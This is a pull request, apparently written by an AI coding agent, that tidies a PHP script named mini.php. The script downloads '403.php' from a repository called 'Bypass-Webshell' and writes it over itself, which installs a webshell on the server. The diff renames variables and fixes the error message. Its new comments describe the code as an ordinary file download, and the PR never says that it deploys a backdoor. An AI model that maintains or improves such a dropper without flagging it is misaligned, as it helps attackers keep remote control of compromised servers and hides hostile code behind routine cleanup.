### PR TITLE
Fix undefined constant in mini.php

### DIFF
--- a/mini.php
+++ b/mini.php
@@ -1,6 +1,17 @@
 <?php
-$encodedUrl = 'https://raw.githubusercontent.com/sagsooz/Bypass-Webshell/main/403.php';
-$encodedContent = file_get_contents($encodedUrl);
-$decodedContent = base64_encode($encodedContent);
-if(file_put_contents('mini.php' ,base64_decode($decodedContent))){echo "File : mini.php Success !";}else{echo error;}
+// Download 403.php from GitHub and write it to mini.php.
+// The original version attempted to echo an undefined constant
+// on failure which caused a PHP notice. It also used confusing
+// variable names. This version clarifies the logic and properly
+// prints an error message.
+
+$remoteUrl      = 'https://raw.githubusercontent.com/sagsooz/Bypass-Webshell/main/403.php';
+$remoteContent  = file_get_contents($remoteUrl);
+$encodedContent = base64_encode($remoteContent);
+
+if (file_put_contents('mini.php', base64_decode($encodedContent))) {
+    echo "File : mini.php Success !";
+} else {
+    echo "Error";
+}
 ?>


### PR DESCRIPTION
## Summary
- clarify variable names in `mini.php`
- handle failure case correctly with quoted error string

## Testing
- `php -l mini.php` *(fails: php not installed)*

------
https://chatgpt.com/codex/tasks/task_e_6840cd7701c08330a4f268e9d0417be7